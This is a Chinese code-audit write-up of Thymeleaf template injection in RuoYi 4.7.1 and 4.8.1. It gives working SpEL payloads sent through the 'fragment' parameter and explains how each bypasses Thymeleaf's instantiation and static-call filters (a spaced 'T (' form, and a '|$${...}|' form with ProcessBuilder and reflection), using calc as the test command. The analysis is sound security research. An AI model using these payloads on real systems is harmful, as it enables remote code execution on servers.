【代码审计】RuoYi-4.7.1&4.8.1 Thymeleaf模板注入分析

目录

[V 4.7.1](#V 4.7.1)

[V 4.8.1](#V 4.8.1)


V 4.7.1

用的是3.0.12的Thymeleaf依赖

该版本对新建类有一些限制

https://github.com/thymeleaf/thymeleaf/issues/809

这三个路由都可以从fragment处打入thymeleaf ssti

打入payload:

复制代码
fragment=${T (java.lang.Runtime).getRuntime().exec("calc")}

来分析下为什么要这么构造payload:

3.0.12的Thymeleaf要求不能containsSpELInstantiationOrStatic

作用是 检测一个 SpEL表达式中是否包含对象实例化(如 new SomeClass(...))或静态方法调用(如 T(SomeClass).method())。

首先是把独立的new给ban了,也不允许出现T(xxx)

可以加个空格,用T (xxx)来进行绕过

V 4.8.1

用的是3.0.15的Thymeleaf依赖

来看下区别

用于检测字符串中是否存在以 $、*、#、@ 或 ~ 开头、后跟空白字符或者{,如果以该格式,则不允许

可以这么绕过

复制代码
|$${new.java.lang.ProcessBuilder('calc').start()}|

等效于

复制代码
'$' + ${new.java.lang.ProcessBuilder('calc').start()}

打入payload:

复制代码
fragment=|$${new.java.lang.ProcessBuilder('calc').start()}|

或者

复制代码
fragment=|$${''.getClass().forName('org.'+'springframework.expression.spel.standard.SpelExpressionParser').newInstance().parseExpression("''.getClass().forName('java.lang.Runtime').getRuntime().exec('calc')").getValue()}|
相关推荐
小怪吴吴26 分钟前
idea 开发Android
android·java·intellij-idea
嘻嘻哈哈樱桃28 分钟前
牛客经典101题题解集--动态规划
java·数据结构·python·算法·职场和发展·动态规划
一次旅行30 分钟前
IDEA安装CC GUI新手指南
java·ide·intellij-idea
超梦dasgg34 分钟前
Spring AI 智能航空助手项目实战
java·人工智能·后端·spring·ai编程
counting money1 小时前
Spring框架基础(配置篇)
java·后端·spring
秋92 小时前
OceanBase与GreatSQL在Java应用中的性能调优方法有哪些?
java·开发语言·oceanbase
今天又在写代码2 小时前
并发问题解决
java·开发语言·数据库
老王以为2 小时前
前端视角下的 Java
java·javascript·程序员
看腻了那片水2 小时前
开源一个对业务代码零侵入的透明数据治理框架 —— 【sangsang】
java·mybatis